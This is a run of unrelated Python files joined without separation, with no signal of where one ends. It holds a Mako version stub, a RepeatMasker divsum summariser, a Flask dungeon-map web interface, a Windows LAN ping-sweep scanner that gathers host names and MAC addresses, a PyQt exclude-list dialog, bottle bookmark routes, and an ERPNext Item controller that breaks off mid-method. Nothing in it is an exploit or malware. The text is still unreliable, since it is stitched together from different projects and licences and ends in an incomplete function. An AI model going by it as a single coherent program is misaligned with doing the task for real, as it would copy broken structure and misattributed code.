# Copyright (C) 2006, 2007, 2008, 2009, 2010 Michael Bayer mike_mp@zzzcomputing.com
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php


__version__ = '0.3.4'


#!/usr/bin/python

import sys

# Python 2 script: summarize a RepeatMasker *.divsum file.  It extracts the
# "Coverage for each repeat class and divergence (Kimura)" matrix and writes,
# per repeat class, the absolute coverage (<file>.abs) and the coverage
# relative to the number of analysed nucleotides (<file>.rel).
print "divsum_analysis.py DivsumFile NumberOfNucleotides"

# Arguments may come from the command line or be prompted interactively.
try:
    file = sys.argv[1]  # NOTE(review): shadows the Python 2 builtin 'file'
except:
    file = raw_input("Introduce RepeatMasker's Divsum file: ")

try:
    nucs = sys.argv[2]
except:
    nucs = raw_input("Introduce number of analysed nucleotides: ")

nucs = int(nucs)

data = open(file).readlines()

# Locate the start of the per-class coverage matrix inside the divsum file.
s_matrix = data.index("Coverage for each repeat class and divergence (Kimura)\n")

# matrix is a list of [class_name, [counts per divergence bin]] pairs.
matrix = []

# The header row: first column is the divergence bin, the rest are classes.
elements = data[s_matrix+1]
elements = elements.split()
for element in elements[1:]:
    matrix.append([element,[]])
n_el = len(matrix)

# Accumulate the per-class coverage counts, one row per divergence bin.
for line in data[s_matrix+2:]:
#    print line
    info = line.split()
    info = info[1:]
    for n in range(0,n_el):
        matrix[n][1].append(int(info[n]))

# NOTE(review): 'abs' shadows the builtin, and round(x, 100) is effectively a
# no-op for floats — presumably a smaller precision was intended; confirm.
abs = open(file+".abs", "w")
rel = open(file+".rel", "w")

for n in range(0,n_el):
    abs.write("%s\t%s\n" % (matrix[n][0], sum(matrix[n][1])))
    rel.write("%s\t%s\n" % (matrix[n][0], round(1.0*sum(matrix[n][1])/nucs,100)))


"""
Copyright 2014 Jason Heeris, jason.heeris@gmail.com

This file is part of the dungeon excavator web interface ("webcavate").

Webcavate is free software: you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.

Webcavate is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with
webcavate. If not, see <http://www.gnu.org/licenses/>.
"""
import argparse
import uuid

from flask import Flask, render_template, request, make_response, redirect, url_for, flash

from dungeon.excavate import render_room

# Command-line help text for the argparse interface in main().
HELP_TEXT = """\
Web interface to the dungeon excavator."""

# Flask application object.  The secret key (used to sign the session cookie
# that carries flash messages) is regenerated on every start, so sessions do
# not survive a restart.
app = Flask('dungeon.web')
app.secret_key = str(uuid.uuid4())

@app.route("/")
def root():
    """Landing page of the web interface."""
    page = render_template('index.html')
    return page


@app.route("/error")
def error():
    """Render the page that displays flashed error messages."""
    page = render_template('error.html')
    return page


def make_map(request, format):
    """Render a dungeon map from the submitted form data.

    Pulls the tile size and the three uploaded files out of *request*,
    renders the room in the requested *format*, and returns a Flask response
    carrying the map — or a redirect to the error page when rendering fails.
    """
    tile_size = int(request.form['size'])
    uploads = request.files
    wall_file = uploads['walls']
    floor_file = uploads['floor']
    floorplan_file = uploads['floorplan']

    try:
        room_data, content_type = render_room(
            floor_file.read(),
            wall_file.read(),
            floorplan_file.read(),
            tile_size,
            format,
        )
    except ValueError as ve:
        # Rendering rejected the input: surface the reason via flash().
        flash(str(ve))
        return redirect(url_for('error'))

    # Wrap the rendered bytes in a response with the right content type.
    response = make_response(room_data)
    response.headers['Content-Type'] = content_type
    return response


@app.route("/map.svg", methods=['POST'])
def map_svg():
    """Render the submitted map as SVG."""
    result = make_map(request, format='svg')
    return result


@app.route("/map.png", methods=['POST'])
def map_png():
    """Render the submitted map as PNG."""
    result = make_map(request, format='png')
    return result


@app.route("/map.jpg", methods=['POST'])
def map_jpg():
    """Render the submitted map as JPEG."""
    result = make_map(request, format='jpg')
    return result


@app.route("/map", methods=['POST'])
def process():
    """Process submitted form data: dispatch to the right map endpoint."""
    format = request.form['format']

    # Map the requested output format to its endpoint; None means unsupported.
    node = {
        'png': 'map_png',
        'svg': 'map_svg',
        'jpg': 'map_jpg',
    }.get(format)

    if node is None:
        flash("The output format you selected is not supported.")
        return redirect(url_for('error'))

    # 307 keeps the POST method (and body) across the redirect.
    return redirect(url_for(node, _method='POST'), code=307)


def main():
    """Parse command-line arguments and start the web interface."""
    parser = argparse.ArgumentParser(description=HELP_TEXT)

    parser.add_argument(
        '-p', '--port',
        help="Port to serve the interface on.",
        type=int,
        default=5050
    )

    parser.add_argument(
        '-a', '--host',
        # BUG FIX: help text said "server" instead of "serve".
        help="Host to serve the interface on.",
    )

    args = parser.parse_args()

    # Blocks until the server is shut down.
    app.run(port=args.port, host=args.host, debug=False)

import subprocess
import time
import sys
import re

class checkIfUp:
    """Scan an IPv4 range: ping every address, then query name/MAC of live hosts.

    Windows-specific: relies on the text output of ``ping -n 1`` and on
    ``\\Windows\\sysnative\\nbtstat.exe`` — confirm before running elsewhere.
    Results are read from the public attributes after construction.

    NOTE(review): the list attributes below are class-level mutables shared
    by every instance; this is only safe while a single instance is created
    per process — confirm before reusing the class.
    """
    __shellPings = []  # queued Popen handles for in-flight pings
    __shell2Nbst = []  # queued Popen handles for in-flight nbtstat calls
    __ipsToCheck = []  # every IP in the requested range, in scan order
    checkedIps = 0  # number of IPs pinged so far
    onlineIps = 0  # number of IPs that answered the ping
    unreachable = 0  # pings whose reply contained 'unreachable'
    timedOut = 0  # pings whose reply contained 'timed out'
    upIpsAddress = []  # the IPs that answered
    computerName = []  # NetBIOS name per online IP ("" when not found)
    completeMacAddress = []  # colon-separated MAC per online IP ("" when not found)
    executionTime = 0  # total scan wall-clock time in seconds
    
    def __init__(self,fromIp,toIp):
        """Validate both endpoints, expand the range, and run the whole scan."""
        startTime = time.time()
        self.fromIp = fromIp # from 192.168.1.x
        self.toIp = toIp # to 192.168.x.x
        self.__checkIfIpIsValid(fromIp)
        self.__checkIfIpIsValid(toIp)
        self.__getRange(fromIp,toIp)
        self.__shellToQueue()
        #self.__checkIfUp() # run by the shellToQueue queue organizer
        self.__computerInfoInQueue()
        endTime = time.time()
        self.executionTime = round(endTime - startTime,3)
        
    def __checkIfIpIsValid(self,ip):
        """Exit the program unless ``ip`` is a dotted quad of numbers in 0-255."""
        def validateRange(val):
            # valid range => 1 <-> 255
            try:
                val = int(val)
                if val < 0 or val > 255:
                    print "Invalid IP Range ("+str(val)+")"
                    sys.exit(0)
            except:
                print "Invalid IP"
                sys.exit(0)
        ip = ip.split(".")
        # NOTE(review): validateRange returns None, so these locals are
        # always None — the call is made only for its exit-on-error effect.
        firstVal = validateRange(ip[0])
        secondVal = validateRange(ip[1])
        thirdVal = validateRange(ip[2])
        fourthVal = validateRange(ip[3])
        return True
    
    def __getRange(self,fromIp,toIp):
        """Fill __ipsToCheck with every address from fromIp to toIp, inclusive."""
        fromIp = fromIp.split(".")
        toIp = toIp.split(".")

        # toIp must be > fromIp
        def ip3chars(ipBlock):
            # input 1; output 001
            ipBlock = str(ipBlock)
            while len(ipBlock) != 3:
                ipBlock = "0"+ipBlock
            return ipBlock
        # Compare zero-padded string forms to decide whether to swap the ends.
        fromIpRaw = ip3chars(fromIp[0])+ip3chars(fromIp[1])+ip3chars(fromIp[2])+ip3chars(fromIp[3])
        toIpRaw = ip3chars(toIp[0])+ip3chars(toIp[1])+ip3chars(toIp[2])+ip3chars(toIp[3])
        if fromIpRaw > toIpRaw:
            # if from is bigger switch the order
            temp = fromIp
            fromIp = toIp
            toIp = temp

        currentIp = [0,0,0,0]
        # all to integers
        currentIp0 = int(fromIp[0])
        currentIp1 = int(fromIp[1])
        currentIp2 = int(fromIp[2])
        currentIp3 = int(fromIp[3])
        toIp0 = int(toIp[0])
        toIp1 = int(toIp[1])
        toIp2 = int(toIp[2])
        toIp3 = int(toIp[3])

        firstIp = str(currentIp0)+"."+str(currentIp1)+"."+str(currentIp2)+"."+str(currentIp3)
        self.__ipsToCheck = [firstIp]
        # Count upward octet by octet (with carry) until the end address.
        while currentIp3 != toIp3 or currentIp2 != toIp2 or currentIp1 != toIp1 or currentIp0 != toIp0:
            currentIp3 += 1
            if currentIp3 > 255:
                currentIp3 = 0
                currentIp2 += 1
                if currentIp2 > 255:
                    currentIp2 = 0
                    currentIp1 += 1
                    if currentIp1 > 255:
                        currentIp1 = 0
                        currentIp0 += 1
            addIp = str(currentIp0)+"."+str(currentIp1)+"."+str(currentIp2)+"."+str(currentIp3)
            self.__ipsToCheck.append(addIp)
        
    def __shellToQueue(self):
        """Launch pings in batches of at most 200 concurrent subprocesses."""
        # write them in the shell queue
        maxPingsAtOnce = 200
        currentQueuedPings = 0
        for pingIp in self.__ipsToCheck:
            proc = subprocess.Popen(['ping','-n','1',pingIp],stdout=subprocess.PIPE,shell=True)
            self.__shellPings.append(proc)
            currentQueuedPings += 1
            if currentQueuedPings >= maxPingsAtOnce:
                #execute shells
                self.__checkIfUp()
                currentQueuedPings = 0
                self.__shellPings = []
        self.__checkIfUp() # execute last queue
            
    def __checkIfUp(self):
        """Drain the ping queue and classify each reply (online/unreachable/timeout)."""
        # execute the shells & determine whether the host is up or not
        for shellInQueue in self.__shellPings:
            pingResult = ""
            shellInQueue.wait()
            while True:
                line = shellInQueue.stdout.readline()
                if line != "":
                    pingResult += line
                else:
                    break;
            self.checkedIps += 1
            if 'unreachable' in pingResult:
                self.unreachable += 1
            elif 'timed out' in pingResult:
                self.timedOut += 1
            else:
                self.onlineIps += 1
                # checkedIps counts across batches, so this indexes the
                # matching entry of the full __ipsToCheck list.
                currentIp = self.__ipsToCheck[self.checkedIps-1]
                self.upIpsAddress.append(currentIp)

    def __computerInfoInQueue(self):
        """Launch nbtstat for each online host, in batches of at most 255."""
        # shell queue for online hosts
        maxShellsAtOnce = 255
        currentQueuedNbst = 0
        for onlineIp in self.upIpsAddress:
            proc = subprocess.Popen(['\\Windows\\sysnative\\nbtstat.exe','-a',onlineIp],stdout=subprocess.PIPE,shell=True)
            self.__shell2Nbst.append(proc)
            currentQueuedNbst += 1
            if currentQueuedNbst >= maxShellsAtOnce:
                # execute shells
                self.__gatherComputerInfo()
                currentQueuedNbst = 0
                self.__shell2Nbst = []
        self.__gatherComputerInfo() # execute last queue

    def __gatherComputerInfo(self):
        """Drain the nbtstat queue and extract each host's NetBIOS name and MAC."""
        # execute the shells and find host Name and MAC
        for shellInQueue in self.__shell2Nbst:
            nbstResult = ""
            shellInQueue.wait()

            computerNameLine = ""
            macAddressLine = ""
            computerName = ""
            macAddress = ""
            while True:
                line = shellInQueue.stdout.readline()
                if line != "":
                    # '<00> ... UNIQUE' is the workstation-name record.
                    if '<00>' in line and 'UNIQUE' in line:
                        computerNameLine = line
                    if 'MAC Address' in line:
                        macAddressLine = line
                else:
                    break;
                
            computerName = re.findall('([ ]+)(.*?)([ ]+)<00>', computerNameLine)
            macAddress = re.findall('([A-Z0-9]+)-([A-Z0-9]+)-([A-Z0-9]+)-([A-Z0-9]+)-([A-Z0-9]+)-([A-Z0-9]+)',macAddressLine)
            try:
                self.computerName.append(computerName[0][1])
            except:
                self.computerName.append("")

            # Re-join the six dash-separated MAC groups with colons.
            completeMacAddress = ""
            firstMacElement = 0
            try:
                for macEach in macAddress[0]:
                    if firstMacElement == 0:
                        firstMacElement += 1
                    else:
                        completeMacAddress += ":"
                    completeMacAddress += macEach
                firstMacElement = 0
            except:
                completeMacAddress = ""
            self.completeMacAddress.append(completeMacAddress)
                        
    def readValue(self):
        """Return a copy of the collected MAC list (debugging helper)."""
        # debugging use only
        ips = []
        for ip in self.completeMacAddress:
            ips.append(ip)
        return ips

# Interactive driver: prompt for an IP range, run the scan, print a summary.
print "\t\t---LANScanner v1.0---\n"
# brief tutorial
print "Sample input data:"
print "FromIP: 192.168.1.50"
print "ToIP: 192.168.1.20"
print "---"
# input
fromIp = raw_input("From: ")
toIp = raw_input("To: ")
# enter values to class
userRange = checkIfUp(fromIp,toIp)
# read class values
print ""
#print userRange.readValue() # debugging use only
print "Checked",userRange.checkedIps,"IPs"
print ""
print "Online:",str(userRange.onlineIps)+"/"+str(userRange.checkedIps)
print "Unreachable:",userRange.unreachable,"Timed out:",userRange.timedOut
print "" # newline
print "Online IPs:"
print "IP\t\tNAME\t\tMAC"
counter = 0
# One row per live host: IP, NetBIOS name, MAC address.
for onlineIp in userRange.upIpsAddress:
    print onlineIp+"\t"+userRange.computerName[counter]+"\t"+userRange.completeMacAddress[counter]
    counter += 1
print ""
print "Took",userRange.executionTime,"seconds"
# This software is licensed under the "GPLv3" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.gnu.org/licenses/gpl-3.0.html

import re
from PyQt5.QtCore import Qt, pyqtSlot
from PyQt5.QtWidgets import (
    QPushButton,
    QLineEdit,
    QVBoxLayout,
    QGridLayout,
    QDialog,
    QTableView,
    QAbstractItemView,
    QSpacerItem,
    QSizePolicy,
    QHeaderView,
)
from .exclude_list_table import ExcludeListTable

from core.exclude import AlreadyThereException
from hscommon.trans import trget

tr = trget("ui")


class ExcludeListDialog(QDialog):
    """Dialog for editing the list of exclusion regular expressions.

    Pairs a core model (ExcludeListDialogCore) with a Qt table view, and lets
    the user add/remove/restore patterns and test a sample path against them.
    """
    def __init__(self, app, parent, model, **kwargs):
        flags = Qt.CustomizeWindowHint | Qt.WindowTitleHint | Qt.WindowSystemMenuHint
        super().__init__(parent, flags, **kwargs)
        self.app = app
        self.specific_actions = frozenset()
        self._setupUI()
        self.model = model  # ExcludeListDialogCore
        self.model.view = self
        self.table = ExcludeListTable(app, view=self.tableView)  # Qt ExcludeListTable
        self._row_matched = False  # test if at least one row matched our test string
        self._input_styled = False

        # Wire the buttons and line edits to their handlers.
        self.buttonAdd.clicked.connect(self.addStringFromLineEdit)
        self.buttonRemove.clicked.connect(self.removeSelected)
        self.buttonRestore.clicked.connect(self.restoreDefaults)
        self.buttonClose.clicked.connect(self.accept)
        self.buttonHelp.clicked.connect(self.display_help_message)
        self.buttonTestString.clicked.connect(self.onTestStringButtonClicked)
        self.inputLine.textEdited.connect(self.reset_input_style)
        self.testLine.textEdited.connect(self.reset_input_style)
        self.testLine.textEdited.connect(self.reset_table_style)

    def _setupUI(self):
        """Build the widgets and grid layout (input line, table, buttons, test line)."""
        layout = QVBoxLayout(self)
        gridlayout = QGridLayout()
        self.buttonAdd = QPushButton(tr("Add"))
        self.buttonRemove = QPushButton(tr("Remove Selected"))
        self.buttonRestore = QPushButton(tr("Restore defaults"))
        self.buttonTestString = QPushButton(tr("Test string"))
        self.buttonClose = QPushButton(tr("Close"))
        self.buttonHelp = QPushButton(tr("Help"))
        self.inputLine = QLineEdit()
        self.testLine = QLineEdit()
        self.tableView = QTableView()
        triggers = (
            QAbstractItemView.DoubleClicked | QAbstractItemView.EditKeyPressed | QAbstractItemView.SelectedClicked
        )
        self.tableView.setEditTriggers(triggers)
        self.tableView.setSelectionMode(QTableView.ExtendedSelection)
        self.tableView.setSelectionBehavior(QTableView.SelectRows)
        self.tableView.setShowGrid(False)
        vheader = self.tableView.verticalHeader()
        vheader.setSectionsMovable(True)
        vheader.setVisible(False)
        hheader = self.tableView.horizontalHeader()
        hheader.setSectionsMovable(False)
        hheader.setSectionResizeMode(QHeaderView.Fixed)
        hheader.setStretchLastSection(True)
        hheader.setHighlightSections(False)
        hheader.setVisible(True)
        gridlayout.addWidget(self.inputLine, 0, 0)
        gridlayout.addWidget(self.buttonAdd, 0, 1, Qt.AlignLeft)
        gridlayout.addWidget(self.buttonRemove, 1, 1, Qt.AlignLeft)
        gridlayout.addWidget(self.buttonRestore, 2, 1, Qt.AlignLeft)
        gridlayout.addWidget(self.buttonHelp, 3, 1, Qt.AlignLeft)
        gridlayout.addWidget(self.buttonClose, 4, 1)
        gridlayout.addWidget(self.tableView, 1, 0, 6, 1)
        gridlayout.addItem(QSpacerItem(0, 0, QSizePolicy.Minimum, QSizePolicy.Expanding), 4, 1)
        gridlayout.addWidget(self.buttonTestString, 6, 1)
        gridlayout.addWidget(self.testLine, 6, 0)

        layout.addLayout(gridlayout)
        self.inputLine.setPlaceholderText(tr("Type a python regular expression here..."))
        self.inputLine.setFocus()
        self.testLine.setPlaceholderText(tr("Type a file system path or filename here..."))
        self.testLine.setClearButtonEnabled(True)

    # --- model --> view
    def show(self):
        """Show the dialog and put keyboard focus on the regex input line."""
        super().show()
        self.inputLine.setFocus()

    @pyqtSlot()
    def addStringFromLineEdit(self):
        """Add the regex currently in the input line to the model's list."""
        text = self.inputLine.text()
        if not text:
            return
        try:
            self.model.add(text)
        except AlreadyThereException:
            self.app.show_message("Expression already in the list.")
            return
        except Exception as e:
            # The model rejected the expression (e.g. it did not compile).
            self.app.show_message(f"Expression is invalid: {e}")
            return
        self.inputLine.clear()

    def removeSelected(self):
        """Remove the rows currently selected in the table."""
        self.model.remove_selected()

    def restoreDefaults(self):
        """Reset the exclusion list to the model's defaults."""
        self.model.restore_defaults()

    def onTestStringButtonClicked(self):
        """Test the string in the test line against the listed regexes and
        against the (uncommitted) regex in the input line."""
        input_text = self.testLine.text()
        if not input_text:
            self.reset_input_style()
            return
        # If at least one row matched, we know whether table is highlighted or not
        self._row_matched = self.model.test_string(input_text)
        self.table.refresh()

        # Test the string currently in the input text box as well
        input_regex = self.inputLine.text()
        if not input_regex:
            self.reset_input_style()
            return
        compiled = None
        try:
            compiled = re.compile(input_regex)
        except re.error:
            # Not a valid regex (yet): just clear any previous highlight.
            self.reset_input_style()
            return
        if self.model.is_match(input_text, compiled):
            self.inputLine.setStyleSheet("background-color: rgb(10, 200, 10);")
            self._input_styled = True
        else:
            self.reset_input_style()

    def reset_input_style(self):
        """Reset regex input line background"""
        if self._input_styled:
            self.inputLine.setStyleSheet(self.styleSheet())
            self._input_styled = False

    def reset_table_style(self):
        """Clear row highlighting left over from a previous string test."""
        if self._row_matched:
            self._row_matched = False
            self.model.reset_rows_highlight()
        self.table.refresh()

    def display_help_message(self):
        """Show the (HTML) help text explaining how exclusion regexes are applied."""
        self.app.show_message(
            tr(
                """\
These (case sensitive) python regular expressions will filter out files during scans.<br>\
Directores will also have their <strong>default state</strong> set to Excluded \
in the Directories tab if their name happens to match one of the selected regular expressions.<br>\
For each file collected, two tests are performed to determine whether or not to completely ignore it:<br>\
<li>1. Regular expressions with no path separator in them will be compared to the file name only.</li>
<li>2. Regular expressions with at least one path separator in them will be compared to the full path to the file.</li><br>
Example: if you want to filter out .PNG files from the "My Pictures" directory only:<br>\
<code>.*My\\sPictures\\\\.*\\.png</code><br><br>\
You can test the regular expression with the "test string" button after pasting a fake path in the test field:<br>\
<code>C:\\\\User\\My Pictures\\test.png</code><br><br>
Matching regular expressions will be highlighted.<br>\
If there is at least one highlight, the path or filename tested will be ignored during scans.<br><br>\
Directories and files starting with a period '.' are filtered out by default.<br><br>"""
            )
        )

from bottle import route, template, error, request, static_file, get, post
from index import get_index
from bmarks import get_bmarks
from tags import get_tags
from add import add_tags
from bmarklet import get_bmarklet
from account import get_account
from edit_tags import get_edit_tags
from importbm import get_import_bm
from edit import do_edit
from login import do_login
from register import do_register

# Page routes.  Each handler simply delegates to its page module.
# BUG FIX: every handler used to be named `bmarks`, shadowing the previous
# one; they now have unique names.  The registered routes are unchanged.

@route('/')
def myroot():
    """Index page."""
    return get_index()

@route('/account', method=['GET', 'POST'])
def account():
    """Account page.

    BUG FIX: this handler previously returned get_bmarklet(); it now calls
    get_account(), which was imported but never used.
    """
    return get_account()

@route('/add', method=['GET', 'POST'])
def add():
    """Add a bookmark / its tags."""
    return add_tags()

@route('/bmarklet')
def bmarklet():
    """Bookmarklet page."""
    return get_bmarklet()

@route('/bmarks')
def bmarks():
    """Bookmark listing."""
    return get_bmarks()

@route('/edit', method=['GET', 'POST'])
def edit():
    """Edit a bookmark."""
    return do_edit()

@route('/edit_tags', method=['GET', 'POST'])
def edit_tags():
    """Edit a bookmark's tags."""
    return get_edit_tags()

@route('/import', method=['GET', 'POST'])
def import_bm():
    """Import bookmarks."""
    return get_import_bm()

@route('/login', method=['GET', 'POST'])
def login():
    """Log in."""
    return do_login()

@route('/register', method=['GET', 'POST'])
def register():
    """Register a new account."""
    return do_register()

@route('/tags')
def tags():
    """Tag listing."""
    return get_tags()

# Static-file routes.  The regex route filters are now raw strings so the
# backslashes are unambiguous.

# serve css
@get(r'/<filename:re:.*\.css>')
def send_css(filename):
    """Serve stylesheets from the css/ directory."""
    return static_file(filename, root='css')

# serve javascript
@get(r'/<filename:re:.*\.js>')
def send_js(filename):
    """Serve scripts from the js/ directory."""
    return static_file(filename, root='js')

# serve images
# BUG FIX: route was missing its leading '/' (cf. the css/js routes above).
@get(r'/<filename:re:.*\.png>')
def send_img(filename):
    """Serve images from the images/ directory."""
    return static_file(filename, root='images')

# serve fonts
# BUG FIX: route was missing its leading '/' (cf. the css/js routes above).
@get(r'/<filename:re:.*\.(woff|woff2)>')
def send_font(filename):
    """Serve web fonts from the fonts/ directory."""
    return static_file(filename, root='fonts')

@error(404)
def handle404(error):
    """Render a minimal page for unknown URLs."""
    body = '<H1>Ooops, its not here<BR>'
    return body

@error(500)
def handle500(error):
    """Render a minimal page for internal server errors."""
    return f'<H1>Oops, its broken:&nbsp;{error}<BR>'

#!/usr/bin/env python

class Message(object):
    """Base type of a message sent through the pipeline.

    Define attributes and methods on a subclass to form your own message
    type; leaving this base class itself unaltered is recommended.
    """

# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt

from __future__ import unicode_literals

import itertools
import json
import erpnext
import frappe
import copy
from erpnext.controllers.item_variant import (ItemVariantExistsError,
		copy_attributes_to_variant, get_variant, make_variant_item_code, validate_item_variant_attributes)
from erpnext.setup.doctype.item_group.item_group import (get_parent_item_groups, invalidate_cache_for)
from frappe import _, msgprint
from frappe.utils import (cint, cstr, flt, formatdate, get_timestamp, getdate,
						  now_datetime, random_string, strip)
from frappe.utils.html_utils import clean_html
from frappe.website.doctype.website_slideshow.website_slideshow import \
	get_slideshow

from frappe.website.render import clear_cache
from frappe.website.website_generator import WebsiteGenerator

from six import iteritems


class DuplicateReorderRows(frappe.ValidationError):
	"""Raised when the reorder-levels table has two rows for the same warehouse."""
	pass


class StockExistsForTemplate(frappe.ValidationError):
	"""Raised when variant-related properties are changed after stock transactions exist."""
	pass


class InvalidBarcode(frappe.ValidationError):
	"""Raised when a barcode fails its EAN/UPC check-digit validation."""
	pass


class Item(WebsiteGenerator):
	"""Controller for the Item doctype; also generates the item's website page."""

	# Website-generator configuration: page title comes from item_name,
	# the page is published only while show_in_website is set, and the
	# rendered page is never cached.
	website = frappe._dict(
		page_title_field="item_name",
		condition_field="show_in_website",
		template="templates/generators/item.html",
		no_cache=1
	)

	def onload(self):
		# Push extra read-only info to the client when the form loads.
		super(Item, self).onload()

		# whether any Stock Ledger Entry exists for this item
		self.set_onload('stock_exists', self.stock_ledger_created())
		self.set_asset_naming_series()

	def set_asset_naming_series(self):
		# Fetch the asset naming series once and cache it on the instance,
		# then expose it to the client via onload.
		if not hasattr(self, '_asset_naming_series'):
			from erpnext.assets.doctype.asset.asset import get_asset_naming_series
			self._asset_naming_series = get_asset_naming_series()

		self.set_onload('asset_naming_series', self._asset_naming_series)

	def autoname(self):
		# Document name always mirrors the item code.
		if frappe.db.get_default("item_naming_by") == "Naming Series":
			if self.variant_of:
				# variants: derive the code from the template item's name
				if not self.item_code:
					template_item_name = frappe.db.get_value("Item", self.variant_of, "item_name")
					self.item_code = make_variant_item_code(self.variant_of, template_item_name, self)
			else:
				from frappe.model.naming import set_name_by_naming_series
				set_name_by_naming_series(self)
				self.item_code = self.name

		self.item_code = strip(self.item_code)
		self.name = self.item_code

	def before_insert(self):
		# Fall back to the item name when no description was supplied.
		if not self.description:
			self.description = self.item_name

		# if self.is_sales_item and not self.get('is_item_from_hub'):
		# 	self.publish_in_hub = 1

	def after_insert(self):
		'''set opening stock and item price'''
		# one Item Price per company-default price list
		if self.standard_rate:
			for default in self.item_defaults:
				self.add_price(default.default_price_list)

		if self.opening_stock:
			self.set_opening_stock()

	def validate(self):
		"""Run all item validations; called by frappe before save."""
		# Fetch the pre-save snapshot first; later checks (e.g.
		# validate_stock_exists_for_template_item) compare against it.
		self.get_doc_before_save()

		super(Item, self).validate()

		if not self.item_name:
			self.item_name = self.item_code

		if not self.description:
			self.description = self.item_name

		self.validate_uom()
		self.validate_description()
		self.add_default_uom_in_conversion_factor_table()
		self.validate_conversion_factor()
		self.validate_item_type()
		self.check_for_active_boms()
		self.fill_customer_code()
		self.check_item_tax()
		self.validate_barcode()
		self.validate_warehouse_for_reorder()
		self.update_bom_item_desc()
		self.synced_with_hub = 0

		self.validate_has_variants()
		self.validate_stock_exists_for_template_item()
		self.validate_attributes()
		self.validate_variant_attributes()
		self.validate_variant_based_on_change()
		self.validate_website_image()
		self.make_thumbnail()
		self.validate_fixed_asset()
		self.validate_retain_sample()
		self.validate_uom_conversion_factor()
		self.validate_item_defaults()
		self.update_defaults_from_item_group()
		self.validate_stock_for_has_batch_and_has_serial()

		# Remember previous group memberships so invalidate_cache_for_item
		# (called from on_update) can clear the right website caches.
		if not self.get("__islocal"):
			self.old_item_group = frappe.db.get_value(self.doctype, self.name, "item_group")
			self.old_website_item_groups = frappe.db.sql_list("""select item_group
					from `tabWebsite Item Group`
					where parentfield='website_item_groups' and parenttype='Item' and parent=%s""", self.name)

	def on_update(self):
		# Refresh website caches and propagate changes to variants/template.
		invalidate_cache_for_item(self)
		self.validate_name_with_item_group()
		self.update_variants()
		self.update_item_price()
		self.update_template_item()

	def validate_description(self):
		"""Sanitize the HTML description when Stock Settings requests it."""
		should_clean = cint(frappe.db.get_single_value('Stock Settings', 'clean_description_html'))
		if should_clean:
			self.description = clean_html(self.description)

	def add_price(self, price_list=None):
		'''Add a new price'''
		# Resolve a price list: explicit argument -> Selling Settings
		# default -> the "Standard Selling" price list.
		if not price_list:
			price_list = (frappe.db.get_single_value('Selling Settings', 'selling_price_list')
						or frappe.db.get_value('Price List', _('Standard Selling')))
		if price_list:
			item_price = frappe.get_doc({
				"doctype": "Item Price",
				"price_list": price_list,
				"item_code": self.name,
				"currency": erpnext.get_default_currency(),
				"price_list_rate": self.standard_rate
			})
			item_price.insert()

	def set_opening_stock(self):
		'''set opening stock'''
		# Serial/batch-tracked (or non-stock) items get no automatic opening entry.
		if not self.is_stock_item or self.has_serial_no or self.has_batch_no:
			return

		# an opening entry needs a valuation rate; fall back to the standard rate
		if not self.valuation_rate and self.standard_rate:
			self.valuation_rate = self.standard_rate

		if not self.valuation_rate:
			frappe.throw(_("Valuation Rate is mandatory if Opening Stock entered"))

		from erpnext.stock.doctype.stock_entry.stock_entry_utils import make_stock_entry

		# default warehouse, or Stores
		for default in self.item_defaults:
			default_warehouse = (default.default_warehouse
					or frappe.db.get_single_value('Stock Settings', 'default_warehouse')
					or frappe.db.get_value('Warehouse', {'warehouse_name': _('Stores')}))

			if default_warehouse:
				stock_entry = make_stock_entry(item_code=self.name, target=default_warehouse, qty=self.opening_stock,
												rate=self.valuation_rate, company=default.company)

				stock_entry.add_comment("Comment", _("Opening Stock"))

	def make_route(self):
		# Build the website route only when none is set yet:
		# "<item group route>/<scrubbed item name or code>-<5 random chars>".
		if not self.route:
			return cstr(frappe.db.get_value('Item Group', self.item_group,
					'route')) + '/' + self.scrub((self.item_name if self.item_name else self.item_code) + '-' + random_string(5))

	def validate_website_image(self):
		"""Validate if the website image is a public file.

		Falls back to ``image`` when ``website_image`` is unset; clears
		``website_image`` (with a message, unless it was auto-set) when the
		file cannot be found or is private.

		Fix: the original placed this text as a bare string statement *after*
		the import guard, where it was a no-op, not a docstring.
		"""
		# skip validation entirely during data import
		if frappe.flags.in_import:
			return

		auto_set_website_image = False
		if not self.website_image and self.image:
			auto_set_website_image = True
			self.website_image = self.image

		if not self.website_image:
			return

		# find if website image url exists as public
		file_doc = frappe.get_all("File", filters={
			"file_url": self.website_image
		}, fields=["name", "is_private"], order_by="is_private asc", limit_page_length=1)

		if file_doc:
			file_doc = file_doc[0]

		if not file_doc:
			if not auto_set_website_image:
				frappe.msgprint(_("Website Image {0} attached to Item {1} cannot be found").format(self.website_image, self.name))

			self.website_image = None

		elif file_doc.is_private:
			if not auto_set_website_image:
				frappe.msgprint(_("Website Image should be a public file or website URL"))

			self.website_image = None

	def make_thumbnail(self):
		"""Make a thumbnail of `website_image` and store its URL in `thumbnail`.

		Fixes: the docstring was a dead string statement placed after the
		import guard; a stray no-op ``pass`` preceded live cleanup code in
		the DoesNotExistError handler.
		"""
		# skip during data import
		if frappe.flags.in_import:
			return

		import requests.exceptions

		# website image changed since last save -> existing thumbnail is stale
		if not self.is_new() and self.website_image != frappe.db.get_value(self.doctype, self.name, "website_image"):
			self.thumbnail = None

		if self.website_image and not self.thumbnail:
			file_doc = None

			try:
				file_doc = frappe.get_doc("File", {
					"file_url": self.website_image,
					"attached_to_doctype": "Item",
					"attached_to_name": self.name
				})
			except frappe.DoesNotExistError:
				# cleanup: drop the "not found" message frappe queued
				frappe.local.message_log.pop()

			except requests.exceptions.HTTPError:
				frappe.msgprint(_("Warning: Invalid attachment {0}").format(self.website_image))
				self.website_image = None

			except requests.exceptions.SSLError:
				frappe.msgprint(
					_("Warning: Invalid SSL certificate on attachment {0}").format(self.website_image))
				self.website_image = None

			# for CSV import
			if self.website_image and not file_doc:
				try:
					file_doc = frappe.get_doc({
						"doctype": "File",
						"file_url": self.website_image,
						"attached_to_doctype": "Item",
						"attached_to_name": self.name
					}).insert()

				except IOError:
					self.website_image = None

			if file_doc:
				if not file_doc.thumbnail_url:
